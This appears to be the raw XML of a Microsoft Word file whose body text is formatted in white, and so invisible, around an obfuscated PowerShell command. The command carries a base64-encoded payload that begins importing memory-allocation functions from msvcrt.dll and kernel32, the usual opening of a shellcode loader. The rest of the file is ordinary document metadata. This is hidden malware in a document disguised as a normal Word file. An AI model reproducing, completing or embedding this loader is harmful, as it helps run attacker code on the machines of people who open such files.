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77492" w:rsidRPr="001C02F8" w:rsidRDefault="009D02C9" w:rsidP="009D02C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C02F8">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>"s''v wRH -;s''v Jc e''c;s''v TD ((g''v wRH).value.toString()+(g''v Jc).value.toString());powershell(g''v TD).value.toString() ('JABJAFgAPQAnACQAcwB5AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwAiACsAIgByACIAKwAiAHQALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwA</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="001C02F8">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="001C02F8">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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'+'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</w:t>
      </w:r>
      <w:r w:rsidRPr="001C02F8">
        <w:rPr>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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')"</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C77492" w:rsidRPr="001C02F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342D4"/>
    <w:rsid w:val="00140A37"/>
    <w:rsid w:val="001C02F8"/>
    <w:rsid w:val="003A6251"/>
    <w:rsid w:val="008664AF"/>
    <w:rsid w:val="009D02C9"/>
    <w:rsid w:val="00B62BA1"/>
    <w:rsid w:val="00BD74B3"/>
    <w:rsid w:val="00C77492"/>
    <w:rsid w:val="00C96324"/>
    <w:rsid w:val="00E276BB"/>
    <w:rsid w:val="00E7340F"/>
    <w:rsid w:val="00ED194F"/>
    <w:rsid w:val="00EF0F38"/>
    <w:rsid w:val="00F342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8DC2024"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C524C23-0E24-4496-A271-F049A9145A0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43</TotalTime>
  <Pages>3</Pages>
  <Words>1166</Words>
  <Characters>6650</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>55</Lines>
  <Paragraphs>15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7801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Furqan Khan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Furqan Khan</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-04T20:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-04T21:30:00Z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TitusGUID">
    <vt:lpwstr>3468cf32-a085-49f1-9420-e4ca53685b28</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="duClassification">
    <vt:lpwstr>GB</vt:lpwstr>
  </property>
</Properties>
</file>